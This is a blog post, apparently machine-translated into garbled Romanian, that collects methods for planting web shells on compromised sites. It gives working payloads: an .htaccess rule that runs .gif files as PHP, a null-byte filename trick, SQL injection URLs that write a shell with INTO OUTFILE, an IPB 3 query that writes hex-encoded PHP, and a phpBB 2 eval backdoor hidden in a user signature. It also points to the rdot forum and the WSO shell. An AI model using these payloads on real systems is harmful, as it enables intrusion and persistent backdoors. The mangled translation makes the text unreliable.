Moduri de a umple o coajă, un blog exploziv
Hello% username% și prietenii săi. Ei bine, asta este o nevoie urgentă de a umple un shell pe site-ul, ei bine, nu se știe niciodată, poate fi taxa de finală depinde de ea. Ei bine, nu funcționează. Aici sunt câteva exemple colectate (mulțumiri lui Tracy și altele pentru acest lucru).
Se toarnă prin imagine coajă
Ai spart site-ul (desigur, numai pentru testare) cu samopisnaya admin ... Și nu poate turnat coajă de web, dar este prezent imagini de umplere și descărcări numai formatul .jpg. GIF. png.
În acest caz, se poate face?
coajă Piha cu extensia .gif în ceea ce un folder cu imagini, și de a crea fișierul .htaccess cu conținutul
AddType application / x-httpd-php Gif
Această comandă va formata .gif ca php
Noi încercăm să deschidă [cale] /shell.gif
De asemenea, în cazul în care script-ul nu este indiferentă față de linia de transfer, vom încerca să umple shell care trece redenumesc shell.php% 00.jpg. verifica disponibilitatea shell.php, și dintr-o dată?
proces de turnare prin calota de văita mysql.user
1) Învață de sub cineva ne așezăm și să învețe ca drepturile sale la MySQL.
site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Noi învățăm de ceea ce noi stăm)
2) utilizatorului site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user='наш „+ - +
(Check out noastre privilegiile utilizatorului. Dacă da o eroare în ieșire, puteți poheksit utilizatorul nostru 0x)
3) site.com/index.php?id=-1+union+select+1, '', 3 + de la + mysql.user + in + outfile + 'calea fișierului' + - +
(Umple mini-shell)
P.S
Ce tot ar obține dreptul are dreptul de a înregistra și cunoaște calea completă la rădăcină.
Doar verifica permisiunile de scriere, puteți:
site.com/index.php?id=1+and+1=0+union+Select+1,'prava“, 3 + de la + mysql.user + - +
Dacă prava apare, atunci chiar acolo.
Următoarea situație. Suntem în admin vBulletin,
Apus de soare:
Plugin-uri # 038; Produse -> Plugin manager -> [Add New Plugin] Plugin-uri # 038; Produse -> Plugin manager -> [Adăugați un nou plugin]
Alegerea temptley. De obicei alege faq_complete, selectați și faceți clic pe pluginul este capusa activă expune «Da» și de a salva.
În continuare vom obține phpinfo ()
Dacă ne-am luat phpinfo () apoi ia în considerare o coajă în mâinile noastre.
Mai târziu, în phpinfo nevoie pentru a găsi calea completă la Forum (de exemplu, /home/u0000/site.ru/www/sell.php). În continuare, avem nevoie de coajă nostru sa transformat într-un fișier txt și completați pentru orice site
mysite.com/shell.txt
Shell pour echipa
Umple coajă în IPB 3
Apus de soare:
-Suport> SQL- de Management> Rulează protsessy-> Faceți o nouă cerere
cod:
selectați 0x3c3f706870696e666f28293b3f3e în outfile 'Z: /home/site.ru/www/uploads/shell.php'
Calea completă poate fi găsită după cum urmează:
Umple coajă în phpBB 2
1. Creați un fișier ex.sql
2. prescrie
phpbb_users UPDATE SET user_sig_bbcode_uid =, user_sig = '/ E \ 0 (+.)' 'phpbb: eval (stripslashes ($ _ GET [e]));' UNDE user_id = 2;
În cazul în care user_id = 2 - Administrator ID
3. Du-te la panoul de administrare
4. În panoul de administrare, selectați elementul „Restore Database“ și ex.sql de încărcare
5. Efectuați codul / umplere shell asa
Aceasta este doar o listă scurtă a modului în care și pe ce motoarele pot umple shell. Aveți nevoie de mai mult? Bine ați venit la băieții de pe rdot
Completați forumurile
Completați CMS
Și aici e cochilie meu preferat, de asemenea, pe rdot))
WSO